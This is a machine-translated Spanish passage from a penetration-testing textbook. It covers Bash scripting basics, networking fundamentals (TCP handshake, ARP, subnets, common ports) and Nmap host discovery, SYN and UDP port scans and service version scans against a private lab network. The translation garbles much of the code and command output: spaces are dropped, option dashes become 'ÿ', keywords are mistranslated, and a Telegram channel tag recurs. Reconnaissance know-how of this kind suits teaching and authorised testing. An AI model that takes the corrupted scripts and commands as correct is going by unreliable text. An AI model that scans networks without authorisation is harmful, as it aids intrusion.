#Calculadora simple que suma hasta 5 números # Almacenarelprimerparámetroinnum1variable NÚM1=${1:-0} # Almacenarelsegundoparámetroinnum2variable NÚM2=${2:-0} # Almacenareltercerparámetroinnum3variable NÚM3 = $ {3: -0} # Almacenarelcuartoparámetroinnum4variable NÚM4=${4:-0} # Almacenar la variable del quinto parámetro innum5 NUM5=${5:-0} #Almacenarlosresultadosadicionalesenlavariabletotal TOTAL=$(($NUM1+$NUM2+$NUM3+$NUM4+$NUM5)) Canal de Telegram : @IRFaraExam Machine Translated by Google echo'#######################' printf"%s%d\n""Thetotalis="$TOTAL echo'###### ##################' Para entender cómo funciona, veamos la variable NUM1 como ejemplo (el mismo concepto se aplica a las cinco variables). Le diremos que lea el primer parámetro {1 de la ventana de la terminal, y si no lo proporciona el usuario, luego configúrelo en cero, como en :ÿ0} . Usando las variables predeterminadas, no estamos limitados a agregar cinco números; de ahora en adelante, podemos agregar tantos números como queramos, pero el máximo es cinco (en el siguiente ejemplo, agregaremos tres dígitos): root@kali:~#simpleadd.sh244 ####################### El total es = 10 ####################### PROPINA Si desea conocer la cantidad de parámetros proporcionados en el script, puede usar $ # para obtener el total. Si agrega la siguiente línea después de la línea printf : printf"%s%d\n""Elnúmerototaldeparámetros="$# deberías ver lo siguiente en la ventana de la terminal: root@kali:~#simpleadd.sh244 ####################### El total es = 10 El número total de parámetros = 3 ####################### Canal de Telegram : @IRFaraExam Machine Translated by Google Entrada del usuario Otra forma de interactuar con la entrada suministrada desde el script de shell es usar la función de lectura. De nuevo, la mejor manera de explicar esto es a través de ejemplos. Le pediremos al usuario que ingrese su nombre y apellido, después de lo cual imprimiremos el nombre completo en la pantalla: #!/bin/bash read-p"Por favor, introduzca su nombre:"FIRSTNAME read-p"Por favor, introduzca su apellido:"APELLIDO printf"Su nombre completo es:$FIRSTNAME$LASTNAME\n" Para ejecutarlo, solo ingresamos el nombre del script (no necesitamos proporcionar ningún parámetro como lo hicimos antes). Una vez que ingresamos el nombre del script, se nos solicitarán los mensajes definidos en el script anterior: root@kali:~#nameprint.sh Ingrese su nombre: Gus Ingrese su apellido: Khawaja Su nombre completo es: Gus Khawaja Funciones Las funciones están lejos de organizar su secuencia de comandos de Bash en secciones ontológicas en lugar de tener una estructura no organizada (los programadores llaman código spaghetti). Tomemos el programa de calculadora anterior y reorganicémoslo (refactorícelo) para que se vea mejor. Este Bashscript (en la Figura 2.3 ) se divide en tres secciones: En la primera sección, creamos todas las variables globales. Las variables globales son accesibles dentro de cualquier función que cree. Por ejemplo, podemos usar todas las NUM variables declaradas en el ejemplo dentro de la función de agregar . Luego, construimos las funciones dividiendo nuestras aplicaciones en secciones lógicas. La función print_custom () simplemente imprimirá cualquier texto que le demos. Estamos usando el $1 para acceder al valor del parámetro pasado a esta función (que es la cadena CALCULATOR ). Finalmente, llamamos a cada función secuencialmente (cada una por su nombre). Imprime el encabezado, agrega los números y, finalmente, imprime los resultados. Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 2.3 Secciones de script Condiciones y bucles Ahora que conoce los conceptos básicos de Bashscripting, podemos introducir técnicas más avanzadas. Cuando desarrolle programas en la mayoría de los lenguajes de programación (p. ej., PHP, Python, C, C++, C#, etc.), incluido Bashscripting, encontrará condiciones ( si declaraciones) y bucles, como se muestra en la Figura 2.4 . Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 2.4 Condiciones y bucles Condiciones Una declaración if toma el siguiente patrón: si[[comparación]] entonces Cierto, hacer algo más Falso, Hacer algo más fi Si ha estado prestando atención, sabe que la mejor manera de explicar este patrón es a través de ejemplos. Desarrollemos un programa que haga ping a un host usando Nmap, y mostraremos el estado de la máquina dependiendo de la condición (el host está activo o inactivo): #!/bin/bash #PingahostusandoNmap Canal de Telegram : @IRFaraExam Machine Translated by Google ###Variables globales### #StoreIPaddress DIRECCIÓN_IP=$1 functionping_host(){ ping_cmd=$ (nmap-sn$IP_ADDRESS|grep'Hostisup'|cut-d'('-f1) } functionprint_status(){ if[[-z$ping_cmd]] luego echo'Hostisdown' else echo'Hostisup' fi } ping_host estado_de_impresión El comando nmap devuelve un texto de cadena vacío si el host está caído o devuelve el valor “Hostis up” si está respondiendo. (Intente ejecutar el comando nmap completo en la ventana de su terminal para visualizar la diferencia. Si es así , reemplace $IP_ADDRESS con una dirección IP real). En la condición if , la opción ÿz verificará si la cadena está vacía; root@kali:~#simpleping.sh10.0.0.11 Hostisdown root@kali:~#simpleping.sh10.0.0.1 Hostisup ¿Qué sucede con otras declaraciones de condición? De hecho, puede comparar números, cadenas o archivos, como se muestra en las tablas 2.1, 2.2 y 2.3. Tabla 2.1 Condiciones numéricas Igual [[x-eqy]] Notequal [[x-ney]] Menos de [[xÿlty] ] Mayor que [[xÿgty]] Canal de Telegram : @IRFaraExam Machine Translated by Google Tabla 2.2 Condiciones de cadena Igual [[str1==str2]] No es igual [[str1!=str2]] Cuerda vacía [[ÿzstr]] Notemptystring [[ÿnstr]] Tabla 2.3 Condiciones de archivo/directorio ¿El archivo existe? [[ÿun nombre de archivo]] ¿Existe el directorio? [[ÿddirectoryname]] ¿Archivo legible? [[ÿrnombre de archivo]] ¿Archivo grabable? [[ÿwnombre de archivo]] ¿Archivo ejecutable? [[ÿxnombre de archivo]] ¿Archivo vacío? [[ÿnombre de archivo]] Bucles Puede escribir bucles de dos maneras diferentes: utilizando un bucle while o un bucle for . Comencemos con un ciclo while que toma la siguiente estructura: while[[condición]] hacer algo hecho La mejor manera de explicar un bucle es a través de un contador del 1 al 10. Desarrollaremos un programa que muestre una barra de progreso: #!/bin/bash #Progressbarwithawhileloop #Encimera CONTADOR=1 #Bar BAR='##########' Canal de Telegram : @IRFaraExam Machine Translated by Google mientras [[$COUNTER-lt11]] hacer #Imprime el progreso de la barra a partir del índice cero echo-ne"\r$ {BAR:0:COUNTER}" # Dormir por 1 segundo dormir 1 #Incrementcounter CONTADOR=$(($CONTADOR+1)) hecho Tenga en cuenta que la condición ( [[$COUNTERÿ lt11 ]] ) en el bucle while sigue las mismas reglas que la condición if . Dado que queremos que el contador termine en 10, . contador, usaremos la siguiente fórmula matemática: contador <11 Cada vez que se mostrará incremente el el progreso. Por otro lado, el bucle for tomará el siguiente patrón: para…en[Listofitems] hacer algo hecho Tomaremos el mismo ejemplo que antes, pero lo usaremos con un bucle for . Se dará cuenta de que el bucle for es más flexible de implementar que el bucle while . (Honestamente, rara vez uso el ciclo while.) Además, no necesitará incrementar su contador de índice; se hace automáticamente para usted: #!/bin/bash #ProgressbarwithaForLoop #Bar BAR='##########' for COUNTERin{1..10} do #Printthebarprogressstartingfromthezeroindex echo-ne"\r${BAR:0:$COUNTER}" # Sleepfor1second sleep1 hecho Iteración de archivos Esto es lo que debe hacer para simplemente leer un archivo de texto en Bash usando el bucle for : Canal de Telegram : @IRFaraExam Machine Translated by Google forlinein$(catfilename) hacer algo hecho En el siguiente ejemplo, guardaremos una lista de direcciones IP en un archivo llamado ips.txt. Luego, reutilizaremos el programa Nmapping (que creamos previamente) para comprobar si todas las direcciones IP están activas o inactivas. Además, comprobaremos el nombre DNS de cada dirección IP: #!/bin/bash #Ping&getDNSnamefromalistofIPsavedinafile #Solicitar al usuario que introduzca un nombre de archivo y su ruta. read-p"Ingrese las direcciones IPnombre del archivo/ruta:"FILE_PATH_NAME functioncheck_host() { #ifnottheIPaddressvalueisvacyif[[-n$IP_ADDRESS]] entonces ping_cmd=$(nmap-sn$DIRECCIÓN_IP|grep'Hostisup' |cortar-d'('-f1) eco'-----------------------------------------------' si[[-z$ping_cmd]] entonces printf"$IP_ADDRESSEstá caído\n" demás printf"$IP_ADDRESSisup\n" nombre_dns ser ser } functiondns_name(){ dns_name=$ (host$IP_ADDRESS) printf"$dns_name\n" } #Iterar a través de las direcciones IP dentro del archivo para ipin$ (cat$FILE_PATH_NAME) do IP_ADDRESS=$ip check_host hecho Canal de Telegram : @IRFaraExam Machine Translated by Google Si ha seguido detenidamente este capítulo, debería poder entender todo lo que ve en el código anterior. La única diferencia en este programa es que utilicé el espacio entre tabuladores para que la secuencia de comandos se viera mejor. El ejemplo anterior cubre la mayor parte de lo que hemos hecho hasta ahora, incluido lo siguiente: Entrada del usuario Declaringvariables Uso de funciones Uso de condiciones if Repeticiones Imprimiendo en la pantalla Resumen Espero que haya practicado todos los ejercicios de este capítulo, especialmente si es nuevo en la programación. Muchos de los conceptos mencionados se aplicarán a muchos lenguajes de programación, así que considere los ejercicios como una oportunidad para aprender los conceptos básicos. Personalmente, uso secuencias de comandos de Bash para escenarios pequeños y rápidos. Si desea crear aplicaciones más complejas, puede intentar hacerlo en Python. ¡No se preocupe! Aprenderá sobre Python al final de este libro para que pueda abordar cualquier situación que desee en su carrera como probador de penetración. Finalmente, este capítulo abarcó mucha información acerca de Bash scripting. Sin embargo, hay mucha más información de la que se encuentra en este capítulo. En la práctica, utilizo motores de búsqueda en Internet para encontrar rápidamente referencias de Bash scripting. De hecho, no es necesario que memorice todo lo que aprendió en este capítulo. Canal de Telegram : @IRFaraExam Machine Translated by Google CAPÍTULO 3 RedHostsEscaneo Este capítulo es su primer paso en el flujo de trabajo de las pruebas de penetración. Tanto si es un lector avanzado como si es un novato, este capítulo le ayudará a realizar el escaneo de su red con éxito. Este capítulo cubre lo siguiente: Los fundamentos de las redes Identificación de hosts activos Escaneo de puertos Enumeración de servicios Huellas dactilares del sistema operativo Nmapscriptingengine Búsqueda de subdominios Conceptos básicos de las redes Antes de comenzar a escanear e identificar hosts, primero debe comprender los conceptos básicos de las redes. Por ejemplo, ¿por qué usamos 10.0.0.1/16? ¿O qué es un protocolo de enlace TCP? ¡Comencemos! Protocolos de red Los siguientes son los dos protocolos de red principales que debe tener en cuenta para escanear una red con éxito. TCP El Protocolo de Control de Transmisión (TCP) es el principal utilizado en la infraestructura de red. Cada servidor de aplicaciones (HTTP, FTP, SMTP, etc.) utiliza este protocolo para conectar correctamente al cliente con el servidor. Canal de Telegram : @IRFaraExam Machine Translated by Google TCP utiliza un concepto denominado protocolo de enlace de tres vías para establecer una conexión de red. Primero, para iniciar una sesión TCP, el cliente envía un paquete SYN (sincronizar) al servidor. El servidor recibe el SYN y responde al cliente con un paquete de sincronización/reconocimiento (SYN/ACK). Por ejemplo, la Figura 3.1 muestra un escenario del Sr. Bob navegando por Internet y buscando en Google (el servidor web) usando su navegador (cliente) visitando www.google.com . Figura 3.1 Apretón de manos TCP Es esencial comprender el concepto del protocolo de enlace TCP. Los escáneres de red como Nmap lo utilizan para identificar hosts activos, puertos abiertos y mucho más (aprenderá más sobre esto en las próximas secciones). Un sniffer de red como Wireshark es una buena herramienta para aprender cómo funcionan las redes informáticas. ¿Por qué? Porque un sniffer de red escuchará todo el tráfico entrante y saliente a través de la tarjeta de red. Para iniciar Wireshark, simplemente escriba su nombre ( $wireshark ) en la ventana del terminal. A continuación, deberá seleccionar la interfaz de red; es Ethernet eth0 o En este . caso, estamos usando eth0 y ,luego wlan0haremos clic en Iniciar WiFi en la esquina superior izquierda de la pantalla (consulte la Figura 3.2). Canal de Telegram : @IRFaraExam Machine Translated by Google Figura 3.2 Selección de interfaz de red Wireshark La figura 3.3 se toma de WiresharkonmyKali (10.0.0.20), que aparece cuando abro mi navegador y voy a Google.com . Si mira de cerca, puede ver los paquetes [SYN], [SYNACK] y [ACK]. Figura 3.3 Captura de Wireshark UDP El Protocolo de datos de usuario (UDP) es una conexión de red sin conexión . A diferencia de la conexión TCP, el cliente y el servidor UDP no garantizarán la transmisión de un paquete, por lo que no hay protocolo de enlace de tres vías en UDP. Otros protocolos de red TCP y UP son los protocolos de red más populares, pero otros tipos de Canal de Telegram : @IRFaraExam Machine Translated by Google los protocolos existen también. En esta sección, cubriremos el resto de ellos. ICMP El protocolo de mensajes de control de Internet (ICMP) se usa para probar la conectividad. La herramienta Ping usa este protocolo para probar si una red host está activa y funcionando ( traceroute también lo usa de manera predeterminada). root@kali:~#ping10.0.0.1-c3 PING10.0.0.1(10.0.0.1)56(84)bytesdedatos. 64 bytes de 10.0.0.1: icmp_seq = 1ttl = 64 tiempo = 0,706 ms 64 bytes de 10.0.0.1: icmp_seq = 2ttl = 64 tiempo = 0,725 ms ---10.0.0.1estadísticas de ping--- 3 paquetes transmitidos, 3 recibidos, 0 % de pérdida de paquetes, tiempo 2033 ms rttmin/avg/max/ mdev=0.506/0.645/0.725/0.099ms La figura 3.4 muestra Wireshark con el filtro icmp aplicado: Figura 3.4 Filtro ICMP de Wireshark ARP El protocolo de resolución de direcciones (ARP) es un mecanismo que asigna direcciones IPv4 a direcciones MAC. Este concepto es esencial para que funcione una red interna. Los enrutadores se conectan entre sí a través de Internet a través de direcciones IP (capa 3), pero una vez que el paquete está dentro de su red, se usará una tabla ARP usando direcciones MAC (capa 2). Puede usar el comando arpÿa para obtener la lista de elementos dentro de la tabla ARP (guardada localmente en su host local): root@kali:~#arp-a ? (10.0.0.10)at70:5a:0f:f6:fc:3a[éter]oneth0 USGPRO(10.0.0.1)atb4:fb:e4:2f:04:3d[éter] oneth0 Las capas se refieren a las capas OSI mostradas anteriormente (consulte la Tabla 3.1). La interconexión de sistema abierto (OSI) separa una conexión de red en Canal de Telegram : @IRFaraExam Machine Translated by Google diferentescapas. Tabla 3.1 Capas OSI NÚMERO NOMBRE PROTOCOLO EJEMPLOS DISPOSITIVO EJEMPLOS 1 Enlace de 2 datos físico MAC, VLAN, etc. Interruptores 3 Red IPv4/v6ICMP, etc. Enrutadores 4 Transporte TCPUDP N/A 5 Sesión NA N/A 6 Presentación NA N/A 7 Aplicación FTP, HTTP, Telnet, etc. Cortafuegos, proxies, etc. Ethernet, etc. cabos Dirección IP El Protocolo de Internet (IP) es uno de los principales pilares de las redes para que las computadoras pueden comunicarse entre sí. Las direcciones IP se dividen en dos versiones:IPv4 y IPv6. IPv4 IPv4 es de 32 bits, pero siempre se presenta en formato decimal, como 192.168.0.1, que es igual a 11000000.10101000.00000000.00000001. Es más fácil de escribir itinadecimalformatinsteadofinbinary, ¿verdad? Las direcciones IP se dividen en públicas, que se utilizan en Internet, y privadas, que se utilizan en una intranet. Su dirección IP pública probablemente se le suministró automáticamente por su proveedor de servicios de Internet (ISP) a menos que haya comprado una dirección IP pública. Estos son los intervalos de direcciones IPv4 privadas: 10.0.0.0 a 10.255.255.255 (10.xxx), con alrededor de 16 millones de direcciones 172.16.0.0 a 172.31.255.255 (172.16.x.x a 172.31.xx), con aproximadamente 1 millones de direcciones 192.168.0.0 a 192.168.255.255 (192.168.xx), con unas 65.000 direcciones SubredesyCIDR El rol de la subred es dividir una red en rangos más pequeños (red Canal de Telegram : @IRFaraExam Machine Translated by Google segmentación). Una subred identificará el número de hosts dentro de un rango de IP. ejemplo, 192.168.0.1 podría tener una máscara de subred 255.255.255.0, lo que significa que podemos usar 254 hosts dentro de este rango de IP. Enrutamiento entre dominios sin clases (CIDR) se creó para simplificar las máscaras de subred. Si tomamos el ejemplo anterior, podemos escribir la subred/24 (el CID equivalente) en lugar de uno largo. Mesa 3.2 enumera las subredes y las máscaras de red que puede usar como referencia. Tabla 3.2 Subredes y CIDR MÁSCARA DE RED CIDR #OFHOSTS /30 255.255.255.252 2 /29 255.255.255.248 6 /28 255.255.255.240 14 /27 255.255.255.224 30 /26 255.255.255.192 62 /25 255.255.255.128 126 /24 255.255.255.0 254 /23 255.255.254.0 510 /22 255.255.252.0 1.022 /21 255.255.248.0 2.046 /20 255.255.240.0 4.094 /19 255.255.224.0 8.190 /18 255.255.192.0 16.382 /17 255.255.128.0 32.766 /dieciséis 255.255.0.0 65,534 /15 255.254.0.0 131,070 /14 255.252.0.0 262,142 /13 255.248.0.0 524,286 /12 255.240.0.0 1,048,574 /11 255.224.0.0 2,097,150 /10 255.192.0.0 4,194,302 /9 255.128.0.0 8,288,606 Canal de Telegram : @IRFaraExam Machine Translated by Google /8 255.0.0.0 16,777,216 IPv6 Hasta ahora, estamos rediseñando IPv4 en gran medida para poner en funcionamiento la infraestructura de red. Ha habido algunos intentos de cambiar de IPv4 a IPv6, ya que el mundo se quedará sin direcciones IPv4 algún día. Debe comprender al menos cómo funciona IPv6 en la práctica. El formato IPv6 es de 128 bits de caracteres hexadecimales. Este es un ejemplo de IPv6 que vale trillones de palabras: fff0:0000:eeee:0000:0000:0000:fe77:03aa Usaremos este ejemplo para ver cómo funciona el formato IPv6. 1. Para seguir las especificaciones de IPv6 primero, necesitamos eliminar los ceros iniciales. Antes: fff0:0000:eeee:0000:0000:0000:fe77:03aa Después:fff0:0:eeee:0:0:0:fe77:3aa 2. Comprimir la serie de ceros (en nuestro caso, hay tres series de ceros) y reemplácelos con ::. Antes: fff0:0:eeee:0:0:0:fe77:3aa Después:fff0:0:eeee::fe77:3aa Tenga en cuenta que en IPv6, puede comprimir una serie de ceros solo una vez. Números de puerto Los números de puerto y las direcciones IP son como hermanos y hermanas. Sin un número de puerto, un paquete de red nunca podrá llegar a su destino. Un número de puerto es como una dirección cívica. Imagine que está utilizando su navegador para llegar a www.google.com . Su paquete necesitará la dirección IP del host del servidor web y el número de puerto, que de manera predeterminada es 443 para HTTPS. En el mismo servidor (con la misma dirección IP), Google podría alojar otros servicios como FTP, por ejemplo; entonces el paquete usará el puerto 21 para llegar a él. La Tabla 3.3 enumera los números de puerto predeterminados más comunes que necesitará saber mientras escanea una red. Canal de Telegram : @IRFaraExam Machine Translated by Google Tabla 3.3 Números de puertos comunes NOMBRE DE PROTOCOLO N.° DE PUERTO NOMBRE DE PROTOCOLO N.° DE PUERTO FTP TCP21 LDAP sobre SSL TCP636 SSH/SCP TCP22 FTP sobre SSL TCP989–990 Telnet TCP23 IMAP sobre SSL TCP993 SMTP TCP25 POP3 sobre SSL TCP995 DNSQuery UDP53 MSÿSQL TCP1433 Transferencia de zona DNS TCP53 NFS TCP2049 DHCP DockerDaemon TCP2375 UDP67 UDP68 TFTP UDP69 base de datos Oracle TCP2483–2484 HTTP TCP80 mysql TCP3306 Kerberos UDP88 PDR TCP3389 POP3 TCP110 VNC SNMP UDP161 TCP5500 PC en cualquier lugar TCP5631 IRC TCP6665–6669 IRCSSL TCP6679 UDP162 NetBIOS TCP/UDP137 TCP/UDP138 TCP/UDP139 IMAP TCP143 TCP6697 LDAP TCP389 BitTorrent TCP6881–6999 HTTPS (TLS) TCP443 Impresoras TCP9100 SMTPoverSSL TCP465 WebDAV TCP9800 iniciar sesión TCP513 Webmin 10000 Esta tabla enumera los números de puerto más populares que personalmente creo que mustknow.Para obtener una lista completa, consulteWikipedia en en.wikipedia.org/wiki/List_of_TCP_and_UDP_port_numbers . Escaneo de red Ahora que comprende los conceptos básicos de la creación de redes, es hora de comenzar la acción. Canal de Telegram : @IRFaraExam Machine Translated by Google En las próximas secciones, aprenderá a identificar hosts de destino en el la red. IdentificandoLiveHosts Hay varias formas de determinar si un host está activo y ejecutándose en el la red. Silbido Puede usar Ping para verificar rápidamente la conexión de red. ¿trabajar bajo el capó? Cuando ejecuta el comando ping , su Kalihost enviará un ICMPecho solicitud al destino, y luego, el objetivo responderá con un ICMP echoreplypacket. Por lo tanto, puede decir que el objetivo está vivo. El comando ping es útil para los administradores del sistema, pero somos la élite, ¿verdad? por qué debe usar Nmap para buscar hosts en vivo. Finalmente, debe tener en cuenta que algunos administradores del sistema cerrarán el ICMP en el nivel del firewall para bloquear los piratas informáticos comprueben la conectividad de algunos servidores. ARP AddressResolutionProtocol es una utilidad fantástica que mapea direcciones IP en direcciones MAC físicas en una red local. Ahora, podemos aprovechar el contenido de la tabla ARP para enumerar todos los hosts en el misma red utilizando el comando arpÿscan en Kali : raíz@kali:~#arp-scan10.0.0.1/24 Interfaz: eth0, tipo: EN10MB, MAC: 00: 0c: 29:40: e7: a6, IPv4: 10.0.0.20 ADVERTENCIA:hostpartof10.0.0.1/24isnon-zero Comenzando arp-scan 1.9.7 con 256 hosts (https:// github.com/royhills/arp-scan) Ubiquiti Networks Inc. Ubiquiti Networks Inc. Ubiquiti Networks Inc. Hewlett Packard SynologyIncorporado Ubiquiti Networks Inc. b4:fb:e4:2f:04:3d10.0.0.1fc:ec:da:d4:d5:9910.0.0.210.0.0.5b4:fb:e4:1b:c4:d270:5a:0f:f6:fc: 3a10.0.0.1010.0.0 Apple Inc. Nmap Canal de Telegram : @IRFaraExam Machine Translated by Google Ha llegado el momento de mostrarle mi herramienta favorita que utilizo para identificar hosts activos: Nmap. Deberá utilizar las siguientes opciones de comando para realizar el trabajo: $nmap-sn[Dirección IP/Rango] Para ayudarlo a memorizarlo, piense en la opción ÿs como Sam y N es Nanny. El significado real de estas áreas de opciones es el siguiente: n es para No. es para Escanear. Es por eso que el nombre de esta opción es No Port Scan. Algunas personas lo llaman Ping Scan, pero no lo mezclen con la herramienta ICMPPing de la que hablamos anteriormente en este capítulo. Dicho esto, veamos por qué esta opción es mágica. Para identificar hosts activos, Nmap intentará hacer lo siguiente: 1. Enviará una solicitud de eco ICMP y Nmap no se rendirá si ICMP es obstruido. 2. Además, enviará una solicitud de marca de tiempo ICMP. 3. Enviará un paquete ACK al puerto 80 y un paquete SYN al puerto 443. 4. Finalmente, enviará una solicitud AR. Es tan poderoso, ¿verdad? Es importante entender que necesitará ser root (o miembro del grupo sudo ) en su Kalibox, o sus opciones serán limitadas, y no podrá ejecutar todas estas funcionalidades. Pongamos a Sam y Nanny en acción: root@kali:~#nmap-sn10.0.0.1/24 A partir de Nmap7.80(https://nmap.org)en2020-10-0509:25EDT NmapscanreportforUSGPRO(10.0.0.1) Hostsup (0.00036 latencia). Dirección MAC: B4: FB: E4: 2F: 04: 3D (Ubiquiti Networks) Nmapscanreportforunifi(10.0.0.2) Hostsup (0.00027 latencia). Dirección MAC: FC: EC: DA: D4: D5: 99 (UbiquitiNetworks) Nmapscan informa para 10.0.0.5 host está activo (latencia de 0,0024). Dirección MAC: B4: FB: E4: 1B: C4: D2 (Ubiquiti Networks) Nmapscan informa para 10.0.0.10 Hostsup (0.0081 latencia). Dirección MAC: 70: 5A: 0F: F6: FC: 3A (HewlettPackard) Nmapscan informa para 10.0.0.50 Host (0.00066 latencia). Canal de Telegram : @IRFaraExam Machine Translated by Google Dirección MAC: 00: 11: 32: 94: 25: 4C (Synology Incorporated) Escaneo de puertos y enumeración de servicios Una de las tareas que se le pedirá durante el análisis de red es buscar los puertos abiertos en cada host. ¿Por qué? Supongamos que desea conocer los servidores web en la red de área local (LAN); el análisis de puertos le permitirá obtener esta información fácilmente. Veamos cómo Nmap maneja esta tarea como un jefe. TCPPortSYNScan Hay muchas opciones en Nmap para ejecutar un escaneo de puertos, pero la que yo siempre uso para TCP es el escaneo SYN. De hecho, Nmap ejecutará este tipo de escaneo de puertos de manera predeterminada: $nmap-sS[Dirección IP/Rango] Para memorizarlo, puede correlacionar la opción ÿs con Sam y Samantha. Piense siempre en Sam y Samantha cuando desee ejecutar un escaneo de puertos . Hice los términos SAMÿSamantha para que los puedas memorizar fácilmente. Permítame explicarle cómo funciona el escaneo SYN en Nmap. El escáner, cuando se suministra con la opción sS , enviará una solicitud SYN al servidor, y si se recibe un SYN / ACK en respuesta, mostrará que el puerto está abierto. Y si el escáner no recibió un SYN/ACK, está cerrado o filtrado . Para el registro, filtrado significa que un firewall lo está protegiendo: root@kali:~#nmap-sS10.0.0.1 Iniciando Nmap7.80(https://nmap.org)en2020-10-0509:27EDT NmapscanreportforUSGPRO(10.0.0.1) Hostsup (0.00051 latencia). No se muestra: 996 puertos cerrados PORTSTATESERVICE 22/tcpopenssh 53/tcpopendomain 80/tcpopenhttp 443/tcpopenhttps MACAddress:B4:FB:E4:2F:04:3D(UbiquitiNetworks) Nmapdone: 1 dirección IP (1 host up) escaneada en 0,25 segundos UDP Canal de Telegram : @IRFaraExam Machine Translated by Google Ahora, ¿qué pasa con el escaneo de puertos UDP? Para usar el escaneo de puertos UDP en Nmap, debe agregar la opción sU : $nmap-sU[Dirección IP/Rango] Es importante tener en cuenta que UDP es lento debido a su naturaleza sin conexión. Siempre podemos usar la opción de temporización T5 para ajustar y hacerlo más rápido. Los cortafuegos pueden bloquear fácilmente T5 en una dirección de Internet. $nmap-sU-T5[Dirección IP/Rango] Por lo tanto, para que el escáner UDP identifique si el puerto está abierto o cerrado, enviará un paquete UDP y esperará una respuesta del destino. Si Nmap obtiene una respuesta o no, probablemente el puerto esté abierto. Por otro lado, si el escáner recibe un error ICMP, entonces el puerto se cierra o se filtra: root@kali:~#nmap-sU-T510.0.0.1 A partir de Nmap7.80(https://nmap.org)a las 2020-10-0509:28EDT Advertencia:10.0.0.1 cediendo en el puerto porque hay un límite de transmisión (2). NmapscanreportforUSGPRO(10.0.0.1) Hostsup (0.0014 latencia). No se muestra: 875 abiertos | puertos filtrados, 123 puertos cerrados PORTSTATESERVICE MACAddress:B4:FB:E4:2F:04:3D(UbiquitiNetworks) 53/udpopendomain 123/udpopenntp Nmapdone: 1 dirección IP (1 host up) escaneada en 119,25 segundos Conceptos básicos del uso de escaneos de Nmap Analicemos los conceptos básicos de Nmap. Si ejecuta Nmap sin ninguna opción, la herramienta usará tres funcionalidades significativas de forma predeterminada: Establecerá la velocidad en T3. Explorará los puertos TCP1000 superiores. Suponiendo que esté enraizado en su Kalibox, establecerá el escaneo SYNTCP de manera predeterminada. En otras palabras, todo esto sucede en el backend, lo que significa que no Canal de Telegram : @IRFaraExam Machine Translated by Google Es necesario especificar la velocidad T3, porque está allí de manera predeterminada. Es lo mismo que para los números de puerto (no es necesario agregar ÿÿtop ÿports1000 ) o el escaneo TCPSYNS (no es necesario agregar la opción ÿsS) . Para la parte de ajuste, recuerde siempre elegir la velocidad con prudencia. Por ejemplo, no utilice una velocidad rápida como T5 en una dirección IP de producción; en su lugar, quédese con la predeterminada (T3). #AquickerTCPscan $nmap–-top-ports100-T5[IPAddress/Rango] Si está apuntando a un puerto específico, use la opción ÿp , seguida del número de puerto, el rango o la lista: #ParabuscarelpuertoHTTP80enlared $nmap-p80[DirecciónIP/ Rango] Por último, si desea incluir todos los puertos, use ÿpÿ (también puede usar ÿp 1ÿ65535 ) para escanear cada puerto individual (escanear todos los números de puerto revelará cualquier aplicación oculta). root@kali:~#nmap-p--T510.0.0.1 Iniciando Nmap7.80(https://nmap.org)en2020-10-0509:35EDT NmapscanreportforUSGPRO(10.0.0.1) Hostsup (0.00097 latencia). No se muestra: 65531 puertos cerrados PORTSTATESERVICE 53/tcpopendomain 22/tcpopenssh 80/ tcpopenhttp 443/tcpopenhttps MACAddress:B4:FB:E4:2F:04:3D(UbiquitiNetworks) Nmapdone: 1 dirección IP (1 host up) escaneada en 9.91 segundos ServiciosEnumeración Canal de Telegram : @IRFaraExam Machine Translated by Google Es hora de ver cómo ejecutar un escaneo de versión de servicio usando el mejor escáner: Nmap . La opción para realizar un análisis de versiones en Nmap es ÿsV . manera de memorizar las opciones de comando en Nmap para aplicar un significado a cada letra. Por ejemplo, la s significa escaneo y la V significa versión. Fácil, ¿verdad? Por eso se llama versioncan . Tome nota de que la aversión puede llevará más tiempo que un escaneo de puertos normal, ya que intentará identificar el tipo de servicio. En el siguiente ejemplo, escanearemos el mismo host que usamos antes, pero esta vez agregaremos la opción ÿsV ( consulte la columna de versión): root@kali:~#nmap-p--T5-sV10.0.0.1 A partir de Nmap7.80(https://nmap.org) a las 2020-10-0509:36EDT NmapscanreportforUSGPRO(10.0.0.1) Hostsup (0.00097 latencia). No se muestra: 65531 puertos cerrados VERSIÓN DEL SERVICIO DEL ESTADO DEL PUERTO 22/tcpopensh2.0) OpenSSH6.6.1p1Debian4~bpo70+1(protocolo 53/tcpopendomaindnsmasq2.78-23-g9e09429 80/tcpopenhttplighthttpd 443/tcpopenssl/httpUbiquitiEdgerouterhttpd Dirección MAC: B4: FB: E4: 2F: 04: 3D (Ubiquiti Networks) ServiceInfo: SO: Linux; Dispositivo: enrutador; CPE: cpe: / o: linux: linux_kernel Detección de servicio realizada. Informe cualquier resultado incorrecto en https://nmap.org/ submit/. Nmapdone: 1 dirección IP (1 host up) escaneada en 25,88 segundos Este es un buen consejo para hacer que las versiones sean aún más rápidas. ¿Listo? Ya que estamos listos escaneado para los puertos abiertos previamente, no necesitamos escanear para todos los puertos nuevamente usando ÿpÿ . En su lugar, solo podemos especificar los números de puerto que identificados en los puertos pueden previamente (comparar el tiempo de velocidad con el anterior versiones escaneadas; ¡es la mitad del tiempo!): root@kali:~#nmap-p22,53,80,443-T5-sV10.0.0.1 A partir de Nmap7.80(https://nmap.org) a las 2020-10-0509:39EDT NmapscanreportforUSGPRO(10.0.0.1) Hostsup (0.00092 latencia). VERSIÓN DEL SERVICIO DEL ESTADO DEL PUERTO 22/tcpopensh2.0) OpenSSH6.6.1p1Debian4~bpo70+1(protocolo 53/tcpopendomaindnsmasq2.78-23-g9e09429 80/tcpopenhttplighthttpd Canal de Telegram : @IRFaraExam Machine Translated by Google 443/tcpopenssl/httpUbiquitiEdgerouterhttpd Dirección MAC: B4: FB: E4: 2F: 04: 3D (Ubiquiti Networks) ServiceInfo: SO: Linux; Dispositivo: enrutador; CPE: cpe: / o: linux: linux_kernel Detección de servicio realizada. Informe cualquier resultado incorrecto en https://nmap.org/submit/. Nmapdone: 1 dirección IP (1 host up) escaneada en 13,63 segundos Finalmente, puede cambiar las versiones de agresividad. En otras palabras, qué tan profundo ¿desea que Nmap escanee la versión de cada servicio? Cuanto mayor sea la intensidad, más tiempo tardará en escanear el host de destino. La Tabla 3.4 resume opciones de intensidad de versión: Table3.4 NmapVersionIntensity OPCIÓN NMAPO DESCRIPCIÓN ÿÿversionÿintensity[0ÿ9] 9 es la intensidad más alta y el valor predeterminado es 7. ÿÿversiónÿlight Es equivalente a ÿÿversionÿintensity2 . ÿÿversiónÿtodas Esequivalente a 